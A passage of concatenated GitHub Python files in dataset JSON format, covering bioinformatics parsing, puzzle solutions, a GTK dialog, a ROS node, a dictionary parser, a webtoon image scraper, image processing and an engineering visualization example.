[RefSnpAlleleFreqStudy(\n name=freq['study_name'],\n allele_count=freq['allele_count'],\n total_count=freq['total_count'],\n ref_snp_allele_idx=allele_idx,\n ref_snp_id=ref_snp_id)\n for freq in allele_annotation['frequency'] or []]\n\n @staticmethod\n def _parse_clin_diseases(allele_annotation, ref_snp_id, 
allele_idx):\n return [RefSnpAlleleClinDisease(\n citation_list=clin['citations'],\n disease_name_csv=\",\".join(clin['disease_names']),\n clinical_significance_csv=\",\".join(clin['clinical_significances']),\n ref_snp_allele_idx=allele_idx,\n ref_snp_id=ref_snp_id)\n for clin in allele_annotation['clinical']]\n\n @staticmethod\n def _parse_gene_locii(allele_annotation):\n assembly_annotation = allele_annotation['assembly_annotation']\n return set(\n [gene['locus'] for gene in\n (assembly_annotation[0]['genes']\n if assembly_annotation else [])])\n","repo_name":"seanharr11/snip_warehouse","sub_path":"snip_warehouse/snip_loader.py","file_name":"snip_loader.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"2977448901","text":"dirs = dict(zip(\"UDLR\", [-1j, 1j, -1+0j, 1+0j]))\nSAMPLE = False\n\nif SAMPLE:\n inp = r\"\"\"5 10 25\"\"\"\nelse:\n inp = r\"\"\"paste\nyour\ninput\"\"\"\n\nout = 0\nfor line in inp.split(\"\\n\"):\n a,b,c = map(int,line.split())\n if not (a+b <= c or b+c <= a or a+c <= b):\n out += 1\nprint(out)\n","repo_name":"mcpower/adventofcode","sub_path":"2016/03-1.py","file_name":"03-1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"37"} +{"seq_id":"22109573662","text":"\"\"\"\n SPLIT LINKED LIST (50CIQ 41: SPLIT A LINKED LIST)\n\n Write a function, which accepts the head of a linked list, then splits the provided linked list, returning two\n (heads of) linked lists. The resulting linked lists should maintain the original order and the lengths must not\n differ by more than one.\n\n Consider the following linked list:\n\n 0 ⟶ 0 ⟶ 0 ⟶ 1 ⟶ 2 ⟶ 0 ⟶ 1 ⟶ 4 ⟶ 5\n\n Example:\n ll = Node(0, Node(0, Node(0, Node(1, Node(2, Node(0, Node(1, Node(4, Node(5)))))))))\n Input = ll # Or, the linked list above.\n Output = Node(0, Node(0, Node(0, Node(1)))), Node(2, Node(0, Node(1, Node(4, Node(5)))))\n\"\"\"\nimport copy\n\n\n# Questions you should ask the interviewer (if not explicitly stated):\n# - What time/space complexity are you looking for?\n# - Clarify the question (what to do when ODD length list, SINGLE/DOUBLY linked list, data type, etc...)?\n\n\n# APPROACH: Fast/Slow Runner\n#\n# Use two pointers, one moving at twice the speed of the other, to determine where the linked list needs to be split.\n#\n# Time Complexity: O(n), where n is the number of nodes in the linked list.\n# Space Complexity: O(1).\ndef split_linked_list(head):\n if head and head.next:\n fast = slow = head\n prev = None\n while fast and fast.next:\n fast = fast.next.next\n prev = slow\n slow = slow.next\n if prev:\n prev.next = None\n return head, slow\n\n\nclass Node:\n def __init__(self, value, next=None):\n self.value = value\n self.next = next\n\n def __iter__(self):\n yield self.value\n if self.next:\n yield from self.next\n\n def __repr__(self):\n return f\"{self.value} ⟶ {'None' if self.next is None else repr(self.next)}\"\n\n\nlinked_lists = [Node(0, Node(0, Node(0, Node(1, Node(2, Node(0, Node(1, Node(4, Node(5))))))))),\n Node(0, Node(1, Node(2, Node(3, Node(4, Node(5)))))),\n Node(0, Node(1, Node(0, Node(1, Node(3, Node(0)))))),\n Node(6, Node(9)),\n Node(0),\n None]\nfns = [split_linked_list]\n\nfor l in linked_lists:\n for fn in fns:\n print(f\"{fn.__name__}({l}): {fn(copy.deepcopy(l))}\")\n 
print()\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/data_structure/linked_list/split_linked_list.py","file_name":"split_linked_list.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70940261869","text":"def lcs (X, Y, m, n):\n\tif m == 0 or n == 0:\n\t\treturn 0\n\t\n\tif X[m-1] == Y[n-1]:\n\t\treturn lcs (X, Y, m-1, n-1) + 1\n\t\n\treturn max(lcs(X, Y, m-1, n), lcs(X, Y, m, n-1))\n\t\nif __name__ == '__main__':\n\tX = input(\"Please enter first string : \")\n\tY = input(\"Please enter second string : \")\n\tm = len(X)\n\tn = len(Y)\n\tprint(\"Maximum Subsequence of X and Y is :\", lcs(X, Y, m, n))\n","repo_name":"ty01khan/InterviewBit","sub_path":"Python/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33532849492","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Johannes Köster\"\n\nimport os\nimport json\nimport io\nimport re\nimport fnmatch\nimport mimetypes\nimport base64\nimport inspect\nimport textwrap\nimport tempfile\nimport subprocess\nimport shutil\nimport mimetypes\nimport datetime\nfrom itertools import chain\n\nfrom snakemake.io import regex, Namedlist\nfrom snakemake.logging import logger\n\n\ndef linecount(filename):\n \"\"\"\n Return the number of lines of given file\n\n Arguments\n filename -- the path to the file\n \"\"\"\n with open(filename) as f:\n return sum(1 for l in f)\n\n\ndef listfiles(pattern, restriction=None, omit_value=None):\n \"\"\"\n Yield a tuple of existing filepaths for the given pattern.\n Wildcard values are yielded as the second tuple item.\n\n Arguments\n pattern -- a filepattern.\n Wildcards are specified in snakemake syntax, e.g. \"{id}.txt\"\n \"\"\"\n pattern = os.path.normpath(pattern)\n first_wildcard = re.search(\"{[^{]\", pattern)\n if first_wildcard:\n dirname = os.path.dirname(pattern[:first_wildcard.start()])\n if not dirname:\n dirname = \".\"\n else:\n dirname = os.path.dirname(pattern)\n pattern = re.compile(regex(pattern))\n for dirpath, dirnames, filenames in os.walk(dirname):\n for f in chain(filenames, dirnames):\n if dirpath != \".\":\n f = os.path.join(dirpath, f)\n match = re.match(pattern, f)\n if match and len(match.group()) == len(f):\n wildcards = Namedlist(fromdict=match.groupdict())\n if restriction is not None:\n invalid = any(\n omit_value not in v and v != wildcards[k]\n for k, v in restriction.items())\n if not invalid:\n yield f, wildcards\n else:\n yield f, wildcards\n\n\ndef makedirs(dirnames):\n \"\"\"\n Recursively create the given directory or directories without\n reporting errors if they are present.\n \"\"\"\n if isinstance(dirnames, str):\n dirnames = [dirnames]\n for dirname in dirnames:\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n\ndef report(\n text, path,\n stylesheet=os.path.join(os.path.dirname(__file__), \"report.css\"),\n defaultenc=\"utf8\", template=None, metadata=None, **files):\n \"\"\"\n Create an HTML report using python docutils.\n Attention: This function needs Python docutils to be installed for the\n python installation you use with Snakemake.\n\n Arguments\n text -- The \"restructured text\" as it is expected by python docutils.\n path -- The path to the desired output file\n stylesheet -- An optional path to a css file that defines the style of the\n document. 
This defaults to the report.css bundled with snakemake.\n Use the default to get a hint on how to create your own.\n defaultenc -- The encoding that is reported to the browser for embedded\n text files, defaults to utf8.\n template -- An optional path to a docutils HTML template.\n metadata -- E.g. an optional author name or email address.\n\n All other keyword args are interpreted as paths to files that shall be\n embedded into the document. The keywords will be available as link\n targets in the text. E.g. append a file as keyword arg via F1=input[0]\n and put a download link in the text like this:\n\n report('''\n ==============\n Report for ...\n ==============\n\n Some text. A link to an embedded file: F1_.\n\n Further text.\n ''', outputpath, F1=input[0])\n\n Instead of specifying each file as a keyword arg, you can also expand\n the input of your rule if it is completely named, e.g.:\n\n report('''\n Some text...\n ''', outputpath, **input)\n\n \"\"\"\n outmime, _ = mimetypes.guess_type(path)\n if outmime != \"text/html\":\n raise ValueError(\"Path to report output has to be an HTML file.\")\n from docutils.core import publish_file\n definitions = textwrap.dedent(\"\"\"\n .. role:: raw-html(raw)\n :format: html\n\n \"\"\")\n\n metadata = textwrap.dedent(\"\"\"\n\n .. container::\n :name: metadata\n\n {metadata} {date}\n\n \"\"\").format(metadata=metadata, date=datetime.date.today().isoformat())\n\n text = format(textwrap.dedent(text), stepout=2)\n\n attachments = [textwrap.dedent(\"\"\"\n .. container::\n :name: attachments\n \n \"\"\")]\n for name, file in sorted(files.items()):\n mime, encoding = mimetypes.guess_type(file)\n if mime is None:\n mime = \"text/plain\"\n logger.warning(\"Could not detect mimetype for {}, assuming \"\n \"text/plain.\".format(file))\n if encoding is None:\n encoding = defaultenc\n with open(file, \"rb\") as f:\n data = base64.b64encode(f.read())\n attachments.append(\n '''\n .. container::\n :name: {name}\n\n [{name}] :raw-html:`<a href=\"data:{mime};charset={charset};filename={filename};base64,{data}\" download=\"{filename}\">{filename}</a>`\n '''.format(\n name=name,\n filename=os.path.basename(file),\n mime=mime,\n charset=encoding,\n data=data.decode()))\n\n text = definitions + text + \"\\n\\n\" + \"\\n\\n\".join(attachments) + metadata\n\n overrides = dict()\n if template is not None:\n overrides[\"template\"] = template\n if stylesheet is not None:\n overrides[\"stylesheet_path\"] = stylesheet\n html = open(path, \"w\")\n publish_file(\n source=io.StringIO(text), destination=html,\n writer_name=\"html\", settings_overrides=overrides)\n\n\ndef R(code):\n import rpy2.robjects as robjects\n robjects.r(format(textwrap.dedent(code), stepout=2))\n\n\ndef format(string, *args, stepout=1, **kwargs):\n class SequenceFormatter:\n def __init__(self, sequence):\n self._sequence = sequence\n\n def __getitem__(self, i):\n return self._sequence[i]\n\n def __str__(self):\n return \" \".join(self._sequence)\n\n frame = inspect.currentframe().f_back\n while stepout > 1:\n if not frame.f_back:\n break\n frame = frame.f_back\n stepout -= 1\n\n variables = dict(frame.f_globals)\n # add local variables from calling rule/function\n variables.update(frame.f_locals)\n variables.update(kwargs)\n strmethods = list()\n for key, value in list(variables.items()):\n if type(value) in (list, tuple, set, frozenset):\n variables[key] = SequenceFormatter(value)\n try:\n return string.format(*args, **variables)\n except KeyError as ex:\n raise NameError(\n \"The name {} is unknown in this context. Please \"
\"\n \"Also note that braces not used for variable access \"\n \"have to be escaped by repeating them, \"\n \"i.e. {{print $1}}\".format(str(ex)))\n\n\nclass Unformattable:\n\n def __init__(self, errormsg=\"This cannot be used for formatting\"):\n self.errormsg = errormsg\n\n def __str__(self):\n raise ValueError(self.errormsg)\n\n\ndef read_job_properties(jobscript, prefix=\"# properties\"):\n with open(jobscript) as jobscript:\n for l in jobscript:\n if l.startswith(prefix):\n return json.loads(l.split(\"=\")[1])\n","repo_name":"gusevfe/snakemake","sub_path":"snakemake/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29926525198","text":"import os\n\nimport gtk\nimport gobject\n\nfrom util import getComboBoxText, errorDialog\n\nclass AskForHelp:\n '''\n Core functionality for the ask for help box, includes validation\n '''\n def __init__(self, parentWindow, subjects, currentSubject = None):\n '''\n subjects - List of all subjects that the user can select\n currentSubject - The subject that should be selected by default\n '''\n self.builder = gtk.Builder()\n dr = os.path.dirname(__file__)\n self.builder.add_from_file(os.path.join(dr, 'gui', 'askforhelp.glade'))\n\n self.window = self.builder.get_object('dgAskForHelp')\n if parentWindow is not None:\n self.window.set_transient_for(parentWindow)\n self.builder.connect_signals(self)\n\n self.window.show_all()\n\n cb = self.builder.get_object('cbSubject')\n ls = gtk.ListStore(gobject.TYPE_STRING)\n cb.set_model(ls)\n for i, subject in enumerate(subjects):\n ls.append([subject])\n if subject == currentSubject:\n cb.set_active(i)\n\n cell = gtk.CellRendererText()\n cb.pack_start(cell, True)\n cb.add_attribute(cell, 'text', 0)\n\n self.subject = self.desc = None\n self.ok = False\n\n self.window.run()\n\n def onCancel(self, event):\n self.window.destroy()\n\n def onOk(self, event):\n #need to get these before everything is destroyed\n self.subject = getComboBoxText(self.builder.get_object('cbSubject'))\n self.desc = self.builder.get_object('txDesc').get_text()\n\n if not len(self.getDescription().strip()):\n errorDialog('There must be a problem description')\n return True\n elif self.getSubject() is None:\n errorDialog('Must have a subject selected')\n return True\n else:\n self.ok = True\n self.window.destroy()\n\n #--------------------------------------------------------------------------\n # Functions designed for external use\n\n def isOk(self):\n ''' Did the user press Ok? 
'''\n return self.ok\n\n def getSubject(self):\n return self.subject\n\n def getDescription(self):\n return self.desc\n","repo_name":"dephraser/edcascaders","sub_path":"client/cascaders/askdialog.py","file_name":"askdialog.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16217096282","text":"import sys\r\nimport random\r\nif len(sys.argv)< 2:\r\n print(\"please supply flash card files.\")\r\n exit(1)\r\nprint(sys.argv[0])\r\nf_c=sys.argv[1]\r\nf=open(f_c,\"r\")\r\nQnA={}\r\n\r\nfor i in f:\r\n QA=i.strip().split(':')\r\n QnA[QA[0]]=QA[1]\r\nf.close()\r\n\r\nprint(\"Welcome to Sabse Bada Foodie\")\r\nprint(\"Press Q to quit\")\r\nprint(\"\")\r\nStates=list(QnA.keys())\r\nwhile True:\r\n state=random.choice(States)\r\n Delicacy=QnA[state]\r\n Ans=str(input(\"Whats popular dish of \"+state +\"?\")).lower()\r\n if Ans =='q':\r\n print(\"Thanks for participating Good bye!\")\r\n break\r\n elif str(Ans).lower()==str(Delicacy).lower():\r\n print(\"You are Correct foody\")\r\n else:\r\n print(\"Wrong answer, popular food of \"+state+\" is \" + Delicacy)\r\n\r\n\r\n\r\n\r\n","repo_name":"Shafin-Thiyam/Python_prac","sub_path":"flash_card.py","file_name":"flash_card.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33716713748","text":"#!/usr/bin/env python\nimport roslib\nimport io\nroslib.load_manifest('manual_robot_control')\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\n\ndef callback(joy):\n msg = Twist()\n msg.linear.x = joy.axes[1]\n msg.angular.z = joy.axes[0]\n pub.publish(msg)\n\n\ndef main():\n \n rospy.init_node('manual_joy_cmd_vel')\n rospy.Subscriber('/IRIS/joy_filtered', Joy, callback)\n global pub\n pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n\n rospy.spin()\n\n\nif __name__== \"__main__\":\n main()\n","repo_name":"IllinoisRoboticsInSpace/IRIS_V_control","sub_path":"manual_robot_control/scripts/xbox_control.py","file_name":"xbox_control.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27362793794","text":"#! python3\n\n# This file is a modified version of Github user hermanschaaf's cedict parser\n# Github repository: https://github.com/hermanschaaf/cedict-parser\n# Original license:\n# \"THE BEER-WARE LICENSE\" (Revision 42):\n# wrote this package. As long as you retain this notice you\n# can do whatever you want with this stuff. 
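\n#\n# (Aside, illustrative: a CC-CEDICT entry line has the shape\n#     傳統 传统 [chuan2 tong3] /tradition/traditional/\n# i.e. traditional form, simplified form, bracketed numbered pinyin, and\n# slash-delimited definitions, which is the layout the slicing in\n# parse_cedict below relies on.)\n#\n# 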
If we meet some day, and you think\n# this stuff is worth it, you can buy me a beer in return Herman Schaaf\n\nimport codecs\nimport json\nimport re\nimport os\n\nfrom pinyin_parser import number_to_tone_mark\n\n\ndef parse_cedict(infile_path, outfile_path):\n\t\"\"\"Takes a path to a Cedict U8 file and a path for the output file.\n\tReads the U8 file and writes a JSON file with a list with\n\tall Cedict definitions in the U8 file.\n\t\"\"\"\n\n\tprint('Parsing Cedict...')\n\n\tf = codecs.open(infile_path, 'r', 'utf8')\n\n\tc = 0\n\n\tnew_words = []\n\tfor line in f:\n\t\tif line.startswith('#'):\n\t\t\tcontinue\n\t\ttrad, simp = line.split(' ')[:2]\n\t\tpinyin = line[line.find('[')+1:line.find(']')]\n\t\teng = line[line.find('/') + 1:line.rfind('/')]\n\t\t\n\t\t# Convert pinyin in the english definitions from using\n\t\t# tone numbers to tone marks\n\t\ttry:\n\t\t\teng = re.sub(\n\t\t\t\t\tr'\\[[1-5a-zA-Z\\s,:·]+\\]',\n\t\t\t\t\tlambda x:\n\t\t\t\t\t\t'[' + number_to_tone_mark(\n\t\t\t\t\t\t\tx.group()[1:-1], umlauted_u='u:'\n\t\t\t\t\t\t) + ']',\n\t\t\t\t\teng\n\t\t\t\t\t)\n\t\texcept:\n\t\t\t# print('Except:', simp,\n\t\t\t# line[line.find('/') + 1:line.rfind('/')])\n\t\t\tpass\n\n\t\tword = {'s': simp,\n\t\t\t\t't': trad,\n\t\t\t\t'e': eng,\n\t\t\t\t'p': number_to_tone_mark(pinyin)\n\t\t\t\t}\n\n\t\tnew_words.append(word)\n\n\tf.close()\n\n\tos.makedirs(os.path.dirname(os.path.abspath(outfile_path)), exist_ok=True)\n\twith open(outfile_path, 'w', encoding='utf8') as outfile:\n\t\tjson.dump(new_words, outfile, indent=4, ensure_ascii=False)\n\n\tprint('Created cedict.json file with %d words.' % len(new_words))\n\tprint()\n\n\nif __name__ == '__main__':\n\n\tparse_cedict(os.path.join('data', 'src', 'cedict_ts.u8'), os.path.join('data', 'cedict.json'))\n","repo_name":"hernanqs/chinese-hqs","sub_path":"python/cedict_parser.py","file_name":"cedict_parser.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26893690077","text":"n = int(input())\nfor i in range(n):\n    pav = input() ## store the word in pav\n    num1 = pav[2:4] ## since the numbers are always placed at the same indices, just slice the string at the right positions of the word; the first one is at indices 2,3\n    num2 = pav[5:8] ## the second number is at indices 5 to 7, remembering that the end index always has to be the desired position +1.\n    num3 = pav[11:13] ## the third and last number is at indices 11 and 12\n    num1 = int(num1) ## after storing the numbers, just convert each one to an integer and print at the end\n    num2 = int(num2)\n    num3 = int(num3)\n    print(num1 + num2 + num3)\n","repo_name":"Ralvesbraga/Linguagem-de-Programacao-Python","sub_path":"Lista6/2694_problema_com_calculadora.py","file_name":"2694_problema_com_calculadora.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21523188531","text":"from math import gcd\nfrom math import atan2\n\nclass Point:\n    def __init__(self, x, y, norm, distance):\n        self.x = x\n        self.y = y\n        self.norm = norm\n        self.distance = distance\n        self.angle = atan2(norm[0], norm[1])\n\ninp = []\nwith open(\"input.txt\", \"r\") as inputFile:\n    inp = [[x for x in y.strip()] for y in inputFile.readlines()]\nasteroids = set()\nfor i in range(len(inp)):\n    for j in range(len(inp[i])):\n        if inp[i][j] == '#':\n            asteroids.add((j, i))\n\n\nans1 = 0\nchosenPoint = (0, 0)\nsees 
= {}\nfor x1, y1 in asteroids:\n    seen = {}\n    for x2, y2 in asteroids:\n        if (x1, y1) == (x2, y2):\n            continue\n        dx, dy = x2 - x1, y2 - y1\n        norm = dx/gcd(dx, dy), dy/gcd(dx, dy)\n        dist = dx**2 + dy**2\n        p = Point(x2, y2, norm, dist)\n        if norm in seen:\n            if seen[norm].distance > p.distance:\n                seen[norm] = p\n        else:\n            seen[norm] = p\n\n    point = (x1, y1)\n    sees[point] = seen.values()\n    if len(sees[point]) > ans1:\n        ans1 = len(sees[point])\n        chosenPoint = point\n\n\nans2Point = sorted(sees[chosenPoint], key = lambda k: (k.angle, -1*k.distance), reverse = True)[199]\n\n\nprint(f\"answer for partOne: {ans1}\")\nprint(f\"answer for partTwo: {ans2Point.x * 100 + ans2Point.y}\")\n\n\n\n\n\n\n","repo_name":"strogera/AoC2019","sub_path":"Day10/d10.py","file_name":"d10.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12315899573","text":"import os\nimport urllib.request\nfrom bs4 import BeautifulSoup\n\n# Create an opener object and add a User-Agent header\nopener = urllib.request.build_opener()\nopener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\nurllib.request.install_opener(opener)\n\n# Create the webtoon folder and move into it\nos.mkdir(\"청춘 블라썸\")\nos.chdir(\"청춘 블라썸\")\n\n# Crawl the webtoon episode list page\nweb = urllib.request.urlopen('https://comic.naver.com/webtoon/list?titleId=746834&page=3')\nsoup = BeautifulSoup(web, 'html.parser')\ntmp = soup.findAll('td', {\"class\":\"title\"})\n\nfor p in tmp:\n    # Remove ':' from the episode title\n    string = p.find(\"a\").text\n    string = string.replace(':', \"\")\n\n    # Create a folder for the episode and move into it\n    os.mkdir(string)\n    os.chdir(string)\n\n    # Crawl the episode's page\n    web2 = urllib.request.urlopen('https://comic.naver.com' + p.find(\"a\")['href'])\n    soup2 = BeautifulSoup(web2, 'html.parser')\n    tmp2 = soup2.find('div', {\"class\": \"wt_viewer\"})\n\n    # Save the episode's images\n    index = 1\n    for img in tmp2.findAll('img'):\n        urllib.request.urlretrieve(img['src'], str(index)+\".jpg\")\n        index += 1\n\n    # Move back to the parent folder\n    os.chdir(\"..\")\n","repo_name":"NaYoung-kr/SWING_Python_Study","sub_path":"image_crawling/image_crawling.py","file_name":"image_crawling.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22008623340","text":"from django.db.models import Q \nfrom music.models import Music\n\ndef Search(request):\n    '''Search function view'''\n    search_query = ''\n\n    if request.GET.get('query'):\n        search_query = request.GET.get('query')\n    \n    only_published_music = Music.objects.filter(published=True)\n\n    music = only_published_music.distinct().filter(\n        Q(title__icontains=search_query)\n    )\n\n    return music","repo_name":"AnonC0DER/NovaMusic-a-django-music-website","sub_path":"NovaMusic/music/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"5088786861","text":"import sys, csv\nimport math\nimport time\nimport warnings\nimport numpy as np\nfrom tifffile import imwrite\nfrom tifffile import TiffFile\nfrom matplotlib import pyplot as plt\nfrom skimage import color, data, restoration, exposure, io\nfrom skimage.morphology import disk, reconstruction\nfrom skimage.filters import threshold_otsu, rank\nfrom skimage.util import img_as_ubyte\nfrom skimage.measure import label, regionprops\n\ndef trans(img):\n    tSave = np.transpose(img,(2,1,0))\n    tSave = 
np.rot90(tSave,3,axes=(1,2))\n    tSave = np.flip(tSave,2)\n    return tSave\n\n# Structure of function call: python 2P_VE.py \n\"\"\"2P_VE.py - Extracts the vessels from the thresholded scan\n              using connected components analysis\"\"\"\n\nplt.rcParams['figure.figsize'] = [10, 10]\nplt.rcParams.update({'font.size': 12})\n\nwarnings.filterwarnings('ignore', '.*rank.*') # Ignores warnings in Otsu thresh about bit depth\n\nfilename = sys.argv[1]\n\n# Read in file\ntif = TiffFile(filename)\nthreshStack = tif.asarray()\n\n[imSlices, imHeight, imWidth] = threshStack.shape\n\n# Parameter importation also likely unnecessary for vessel extraction\n\n# Remove any excessive labels -= How to make more efficient\n# And how to use the Area masks for branching\naMasks = np.empty((imHeight, imWidth))\neMasks = np.empty((imHeight, imWidth))\ncMasks = np.empty((imHeight, imWidth))\nfor image in threshStack:\n    labelImg = label(image)\n    regions = regionprops(labelImg)\n    aIndices = []\n    areas = []\n    eccIndices = []\n    eccs = []\n    circIndices = []\n    circs = []\n    aMask = np.zeros((imHeight, imWidth))\n    eMask = np.zeros((imHeight, imWidth))\n    cMask = np.zeros((imHeight, imWidth))\n    for num, x in enumerate(regions):\n        area = x.area_filled # What if you did convex area, or feret_diameter_max\n        perimeter = x.perimeter\n        ecc = x.eccentricity\n        if(perimeter > 0):\n            circ = (4*math.pi*area)/(perimeter**2)\n        else:\n            circ = 10000\n        \n        if (area > 100) and (area < 500):# and (ecc < 0.78) and (circ > 0.25):\n            aIndices.append(num)\n        \n        if (ecc < 0.8):\n            eccIndices.append(num)\n            areas.append(area)\n            #eccs.append(ecc)\n        if (circ > 0.15) and (circ < 1):\n            circIndices.append(num)\n            #circs.append(circ)\n    for index in aIndices:\n        aMask += (labelImg==index+1).astype(int)\n    for index in eccIndices:\n        eMask += (labelImg==index+1).astype(int)\n    for index in circIndices:\n        cMask += (labelImg==index+1).astype(int)\n    # Fill in mask w/ skimage.reconstruction - erosion\n    seed = np.copy(aMask)\n    seed[1:-1,1:-1] = 1\n    aMask = reconstruction(seed, aMask, method = 'erosion')\n    seed = np.copy(eMask)\n    seed[1:-1,1:-1] = 1\n    eMask = reconstruction(seed, eMask, method = 'erosion')\n    seed = np.copy(cMask)\n    seed[1:-1,1:-1] = 1\n    cMask = reconstruction(seed, cMask, method = 'erosion')\n    aMasks = np.dstack((aMasks, aMask))\n    eMasks = np.dstack((eMasks, eMask))\n    cMasks = np.dstack((cMasks, cMask))\n\naMasks = aMasks[:,:,1:imSlices+1]\neMasks = eMasks[:,:,1:imSlices+1]\ncMasks = cMasks[:,:,1:imSlices+1]\n\n## NOW TACKLE THESE MASKS SIDEWAYS TO GET SOME MORE CONNECTED COMPONENTS - start w/ emask\n## Takes 68.5 seconds for a 510x201x510 scan\n\nvMasks = np.empty((imHeight, imSlices))\nfor scan in cMasks:\n    scan = np.array(scan)\n    exScan = np.zeros_like(scan)\n    for rid, row in enumerate(scan):\n        pidx = np.where(row==1)[0]\n        for pid in pidx:\n            sect = np.array(scan[rid,pid:pid+15])\n            idx = np.where(sect == 1)[0]\n            ext = idx[idx.size-1]\n            exScan[rid,pid:pid+ext] = 1\n    vMasks = np.dstack((vMasks,exScan))\n\nvMasks = vMasks[:,:,1:imWidth+1]\nvMasks = np.transpose(vMasks,(0,2,1))\n\n# Connected component issue, might be dependent on depth of scan\n## Another connected component analysis, 3D, to isolate and remove the smaller regions to try to reduce error\nlv = label(vMasks)\nregions = regionprops(lv)\nfullMask = np.empty((imHeight,imWidth,imSlices))\nvidx = []\nareas = []\nminVol = (imHeight*imWidth*imSlices)/6535 # Experimentally concluded, I'm not sure how else to determine the volume percentage\nfor num, x in enumerate(regions):\n    area = x.area\n    if (area > 
minVol): #Calculate approximate volume based on image dimensions\n vidx.append(num)\n areas.append(area)\n\nfor index in vidx:\n fullMask += (lv==index+1).astype(int)\n\n# Special transformation for saving the full mask\nfullMask = np.transpose(fullMask, (2,0,1))\nfullMask = np.rot90(fullMask, 1, axes=(1,2))\nfullMask = np.flip(fullMask,1)\n\n# Saving process to have same orientation in ImageJ and display, might be unnecessary?\naMasks = trans(aMasks)\neMasks = trans(eMasks)\ncMasks = trans(cMasks)\naSave = aMasks.astype('float32')\neSave = eMasks.astype('float32')\ncSave = cMasks.astype('float32')\nfullSave = fullMask.astype('float32')\nareaOFN = filename[0:filename.find('_OT.tif')] + '_AREA_Mask.tif'\neccOFN = filename[0:filename.find('_OT.tif')] + '_ECC_Mask.tif'\ncircOFN = filename[0:filename.find('_OT.tif')] + '_CIRC_Mask.tif'\nvesselOFN = filename[0:filename.find('_OT.tif')] + '_VESSEL_Mask.tif'\nimwrite(areaOFN, aSave, photometric='minisblack')\nimwrite(eccOFN, eSave, photometric='minisblack')\nimwrite(circOFN, cSave, photometric='minisblack')\nimwrite(vesselOFN, fullSave, photometric='minisblack')","repo_name":"CollinPretzel/2P_Processing","sub_path":"2P_VE.py","file_name":"2P_VE.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29444431469","text":"import collections\n\nimport pytest\n\n\ndef compute(signature, n):\n \"\"\"Write the len(signature) nbonci and return first n elements.\"\"\"\n n_bonaci = len(signature)\n\n if n < n_bonaci:\n return signature[:n]\n\n deq = collections.deque(signature, maxlen=n_bonaci)\n res = signature\n while len(res) < n:\n s = sum(deq)\n res.append(s)\n deq.append(s)\n return res\n\n\n# put arguments and expected results here\nARGS_RESULTS = [\n (([0, 1], 10), [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]),\n (([1, 1], 10), [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]),\n (([0, 0, 0, 0, 1], 10), [0, 0, 0, 0, 1, 1, 2, 4, 8, 16]),\n (([1, 0, 0, 0, 0, 0, 1], 10), [1, 0, 0, 0, 0, 0, 1, 2, 3, 6]),\n (([1, 0, 0, 0, 0, 0, 0, 0, 0, 0], 20), [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 2, 4, 8, 16, 32, 64, 128, 256])\n]\n\n\n@pytest.mark.parametrize(\n ('input_args', 'expected'),\n ARGS_RESULTS,\n)\ndef test(input_args, expected) -> None:\n assert compute(*input_args) == expected\n\n\ndef main() -> int:\n for args, result in ARGS_RESULTS:\n print(compute(*args))\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"JakubDotPy/codewars","sub_path":"katas/fib_trib_friends.py","file_name":"fib_trib_friends.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23291398163","text":"\"\"\"\n.. _ref_sector_model:\n\nCyclic Model Visualization\n~~~~~~~~~~~~~~~~~~~~~~~~~~\nVisualize and animate a full cyclic model. This model is based on the\njetcat rotor.\n\nFirst, load the rotor. Notice how printing the rotor class reveals\nthe details of the rotor result file.\n\"\"\"\n# sphinx_gallery_thumbnail_number = 2\nfrom ansys.mapdl.reader import examples\n\nrotor = examples.download_sector_modal()\nprint(rotor)\n\n###############################################################################\n# Plot the rotor and rotor sectors\n#\n# Note that additional keyword arguments can be passed to the 